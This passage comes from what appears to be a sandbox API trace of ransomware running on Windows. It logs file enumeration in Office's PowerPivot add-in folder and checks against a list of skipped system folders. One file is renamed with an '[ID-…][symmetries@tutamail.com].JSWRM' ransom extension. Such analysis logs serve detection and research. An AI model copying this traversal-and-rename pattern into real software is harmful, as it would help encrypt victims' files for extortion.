RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0125.775] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ar\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ar\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ar\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ar\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.776] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x95505c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x95505c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9a13a8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd040, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.resources.dll", cAlternateFileName="MIE3DA~1.DLL")) returned 1 [0125.776] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2=".") returned 1 [0125.776] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="..") returned 1 [0125.776] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="...") returned 1 [0125.776] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="windows") returned -1 [0125.776] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="recovery") returned -1 [0125.776] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="perflogs") returned -1 [0125.776] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="documents and settings") returned 1 [0125.776] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.776] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="system volume information") returned -1 [0125.776] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="msocache") returned -1 [0125.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0125.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0125.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22cdc8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0125.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0125.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0125.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d0d8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0125.776] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6a0a7fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a0a7fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6a30a43, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x39aa8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cAlternateFileName="MIDF86~1.DLL")) returned 1 [0125.776] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2=".") returned 1 [0125.776] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="..") returned 1 [0125.776] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="...") returned 1 [0125.776] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="windows") returned -1 [0125.776] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="recovery") returned -1 [0125.776] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="perflogs") returned -1 [0125.776] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="documents and settings") returned 1 [0125.776] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.776] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="system volume information") returned -1 [0125.776] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="msocache") returned -1 [0125.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0125.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0125.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0125.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d770, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0125.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0125.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dde8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0125.777] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9a77594, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9a77594, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9a77594, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x15030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cAlternateFileName="MI038C~1.DLL")) returned 1 [0125.777] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2=".") returned 1 [0125.777] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="..") returned 1 [0125.777] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="...") returned 1 [0125.777] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="windows") returned -1 [0125.777] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="recovery") returned -1 [0125.777] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="perflogs") returned -1 [0125.777] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="documents and settings") returned 1 [0125.777] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.777] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="system volume information") returned -1 [0125.777] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="msocache") returned -1 [0125.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0125.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0125.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0125.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d800, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0125.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0125.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0125.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d728, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0125.777] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x688d06d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x688d06d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x688d06d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x20d030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cAlternateFileName="MIF61E~1.DLL")) returned 1 [0125.777] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2=".") returned 1 [0125.777] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="..") returned 1 [0125.777] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="...") returned 1 [0125.777] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="windows") returned -1 [0125.777] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="recovery") returned -1 [0125.777] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="perflogs") returned -1 [0125.777] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="documents and settings") returned 1 [0125.777] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.778] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="system volume information") returned -1 [0125.778] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="msocache") returned -1 [0125.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0125.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0125.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20dde8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0125.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0125.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0125.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20d920, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0125.778] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x67ce4b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67ce4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67ce4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2aa8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Layout.resources.dll", cAlternateFileName="MI8E88~1.DLL")) returned 1 [0125.778] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2=".") returned 1 [0125.778] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="..") returned 1 [0125.778] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="...") returned 1 [0125.778] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="windows") returned -1 [0125.778] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="recovery") returned -1 [0125.778] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="perflogs") returned -1 [0125.778] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="documents and settings") returned 1 [0125.778] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.778] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="system volume information") returned -1 [0125.778] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="msocache") returned -1 [0125.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0125.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0125.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22cdc8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0125.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0125.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0125.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22ce70, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0125.778] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1698075, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1698075, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1698075, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x20040, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cAlternateFileName="MI93CC~1.DLL")) returned 1 [0125.778] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2=".") returned 1 [0125.778] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="..") returned 1 [0125.778] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="...") returned 1 [0125.778] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="windows") returned -1 [0125.779] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="recovery") returned -1 [0125.779] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="perflogs") returned -1 [0125.779] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="documents and settings") returned 1 [0125.779] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.779] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="system volume information") returned -1 [0125.779] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="msocache") returned -1 [0125.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0125.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0125.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20dba8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0125.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0125.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0125.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20d698, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0125.779] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1c1a793, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1c1a793, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1c1a793, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2e60, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.Interfaces.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0125.779] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2=".") returned 1 [0125.779] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="..") returned 1 [0125.779] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="...") returned 1 [0125.779] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="windows") returned -1 [0125.779] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="recovery") returned -1 [0125.779] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="perflogs") returned -1 [0125.779] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="documents and settings") returned 1 [0125.779] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.779] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="system volume information") returned -1 [0125.779] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="msocache") returned -1 [0125.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0125.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0125.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20dba8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0125.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0125.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20dde8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0125.780] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5ad77c9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5ad77c9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5fc257f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4e050, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.resources.dll", cAlternateFileName="MI9A58~1.DLL")) returned 1 [0125.780] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2=".") returned 1 [0125.780] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="..") returned 1 [0125.780] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="...") returned 1 [0125.780] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="windows") returned -1 [0125.780] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="recovery") returned -1 [0125.780] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="perflogs") returned -1 [0125.780] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="documents and settings") returned 1 [0125.780] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.780] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="system volume information") returned -1 [0125.780] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="msocache") returned -1 [0125.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0125.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0125.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0125.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d0d8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", 